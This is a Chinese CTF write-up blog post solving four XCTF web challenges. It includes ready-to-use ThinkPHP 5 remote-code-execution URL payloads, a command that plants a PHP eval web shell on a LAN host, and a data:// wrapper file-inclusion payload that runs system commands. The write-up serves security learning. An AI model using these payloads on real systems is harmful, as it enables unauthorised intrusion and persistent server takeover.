史上最详细系列--攻防世界web(高手进阶区1-4)

最新推荐文章于 2024-05-12 17:54:20 发布
最新推荐文章于 2024-05-12 17:54:20 发布
阅读量2k 收藏 10
点赞数 2
文章标签: php web linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43911311/article/details/105216302
版权

1.Baby web

  1. 首先看题目描述
    在这里插入图片描述
    是不是直接给了提示呢,答案是index.php
    所以只需要打开index.php界面就能得到结果

  2. 当你输入index.php的时候,会自动跳转两次,所以最后还是1.php界面

  3. 此时需要F12,打开network

  4. 再次输入index.php,会抓取到以下结果
    在这里插入图片描述
    所以结果就出来了flag{very_baby_web}

2.Training-WWW-Robots

1.出现在界面的是一段提示,简要的翻译:
在这个小小的培训挑战中,您将学习Robots_exclusion_standard。
网络搜寻器使用robots.txt文件检查是否允许他们对您的网站或网站的一部分进行爬网和编制索引。
有时,这些文件显示目录结构,而不是防止内容被爬网。
2.根据提示robots.txt是关键,而之前了解到这个文件是保存在根目录下的,所以直接输入
在这里插入图片描述
内容不再具体分析,了解看web新手区
所以这里最重要的就是第二行 /fl0g.php,注:最好复制粘贴,很容易出现问题
所以输入得到结果
在这里插入图片描述
cyberpeace{90f6d84840895ded776787fd5dfe1b94}

3.Php_rce

在这里插入图片描述
RCE英文全称:remote command/code execute 分为远程命令执行ping和远程代码执行evel。
漏洞出现的原因:没有在输入口做输入处理。
两个基本命令执行:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

执行phpinfo()函数:
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

直接尝试第一个,当然第二个也可以尝试
在这里插入图片描述
得到相应的结果,这里就可以直接运行linux命令了
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name “flag”
在这里插入图片描述
得到目录,直接查看
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag /flag
在这里插入图片描述
flag{thinkphp5_rce}

http://192.168.1.107/tp5.0.15/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_GET["code"])?^>>shell.php

4.Web_php_include

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

参考文章
尝试使用的是data伪协议方法
data://伪协议
php5.2.0起,数据流封装器开始有效,主要用于数据流的读取。如果传入的数据是PHP代码,就会执行代码
使用方法:data://text/plain;base64,xxxx(base64编码后的数据)
1.查看目录hackbar安装下载
在Firefox的插件hackbar中有编码和解码工具,可以点击Base64 Encode会弹出对话框,输入编码的源代码即可,另外,这里的"+"号需要用URL编码,所以
page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpOz8%2b
在这里插入图片描述
目录中含有一个可疑文件,用同样的方法输入<?php system("cat f14gisisish3r3.php");?>,在网络中查看响应得到flag

在这里插入图片描述

青衫_渗透新手
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界之Training-WWW-Robots
qq_44111753的博客
11-14 303
WP 攻防世界 Training-WWW-Robots 题目 writeup 很明显,查看robots.txt文件 提示查看fl0g.php文件 得到flag了~
XCTF web进阶wp(一)
0xdawn的博客
02-28 951
001 Training-WWW-Robots 查看robots.txt,发现Disallow: /fl0g.php,打开后得到flag。 002 baby_web 初始页面为index.php,bp抓包查看响应就行 003 warmup F12拿到源码链接source.php hint.php:flag not here, and flag in ffffllllaaaagggg &l...
攻防世界-router
最新发布
Sa1nZen的博客
05-12 154
攻防世界-router。
攻防世界XCTF:Training-WWW-Robots
末初的CSDN博客
03-07 368
根据提示访问robots.txt 访问fl0g.php
XCTF-Training-WWW-Robots
weixin_45613760的博客
08-04 243
XCTF-Training-WWW-Robots从题目就可以知道这道题考察的是robots协议什么是robots协议访问robots.txt找到存放flag的目录-fl0g.php 从题目就可以知道这道题考察的是robots协议 打开链接 什么是robots协议 robots协议也叫robots.txt(统一小写)是一种存放于网站根目录下的ASCII编码的文本文件,它通常告诉网络搜索引擎的漫游器(又称网络蜘蛛),此网站中的哪些内容是不应被搜索引擎的漫游器获取的,哪些是可以被漫游器获取的。因为一些系统中的U
CTFshow web入门——文件包含
小元砸的博客
02-07 3407
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
攻防世界—-(web进阶)FlatScience–WP
12-14
1.login.php 2.admin.php (还有一个robots.txt, 打开之后也是指向上面两个页面的) 先试一下admin.php,尝试几个密码登陆没有结果。 查看页面源代码 有提示,就先暂时先不考虑弱口令 打开另一个页面login.php 查看源...
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
商业编程-源码-缓冲溢出攻防.zip
06-23
《商业编程-源码-缓冲溢出攻防》是一个重要的主题,特别是在软件安全领域。缓冲溢出是计算机程序中常见的安全漏洞,它源于程序员在处理数据输入时的疏忽,可能导致系统崩溃、数据丢失,甚至允许攻击者执行恶意...
攻防世界杂项津门杯2021-m1
11-14
攻防世界杂项津门杯2021-m1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127840757
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界--shrine-(详细操作)做题笔记
qq_43715020的博客
06-14 926
攻防世界--shrine-笔(详细操作)做题笔记
攻防世界——web高手进阶题解
热门推荐
小锤队长的博客
10-01 2万+
目录 1,cat (Django,cURL漏洞) 2,ics-05(XCTF 4th-CyberEarth)(文件包含 + preg_replace函数漏洞) 3,ics-06(爆破id) 4,lottery(.git文件泄露) 5,NewsCenter(sql注入) 6,mfv(.git文件泄露 + php审计+ 命令执行) 7,Training-WWW-Robots(robo...
攻防世界Web “ics-06、unserialize3、supersqli”题解
qq_53325209的博客
04-18 3280
攻防世界Web 高手进阶 “ics-06、unserialize3、supersqli”三道题解。
CTF_Web攻防世界高手进阶题WP(19-21)
AFCC_的博客(Web_Dog)
09-09 1635
NSCTFweb2题解 打开题目直接是一段代码,提示逆向即为flag,首先看代码: <?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); // echo $_o; for($_0=0;$_0<strlen($_o);$_0++){
【网络安全必看】如何提升自身WEB渗透能力?
kali_Ma的博客
11-26 2590
web渗透这个东西学起来如果没有头绪和路线的话,是非常烧脑的。理清web渗透学习思路,把自己的学习方案和需要学习的点全部整理,你会发现突然渗透思路就有点眉目了。程序员之间流行一个词,叫35岁危机,,意思就是说35岁是个坎,容易被淘汰。那么安全行业有这个坎吗?我觉得没有,因为安全和之前岗位不一样,年龄大的他经验更丰富,反而比较吃香,尤其很多大厂招聘要求都是5-10年,这没有30、40岁能有10年经验?网络安全好混,但不容易混得好。其实任何行业都是这样,想混得好,必须不断学习提升。
攻防世界upload3
qq_28808571的博客
05-25 763
1.看到题目为文件上传,且题目描述中有源码泄露。将源码下载后发现为thinkphp5.1,于是直接百度发现thinkphp5.x的反序列化漏洞,但是由于源码中含有查找文件,一开始误以为是文件名注入. 但对源码的审计发现,对上传的文件检查还是比较严格的 还检查了文件头,但是可以使用GIF89a+一句话还是能够上传成功的,上传成功后可以在上传界面查看源码得到路径 结合源码发现这是 ...
攻防世界-- web高手进阶-- writeup汇总
yisosooo的博客
09-22 6300
随做随记,争取记录详细思路,以供后续反思。 第一题-- cat 按照提示输入loli.club,没有任何回显。输入baidu.com也没有任何回显。再次尝试输入127.0.0.1,出现: 可知,submit其实是ping命令,而且好像只对ip地址起作用。尝试运行系统命令: 失败。输入127.0.0.1 | ls 同样失败。但是发现URL编码可以传入。当输入到%80时,出现报错信息,...
攻防世界 misc 4-1
09-13
攻防世界的misc 4-1题目需要进行一些步骤和操作来解决。首先,我们需要前往题目链接。在这个链接中,我们可以找到题目的详细描述和要求。根据题目要求,我们需要使用binwalk工具进行分析。binwalk是一个用于分析二...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值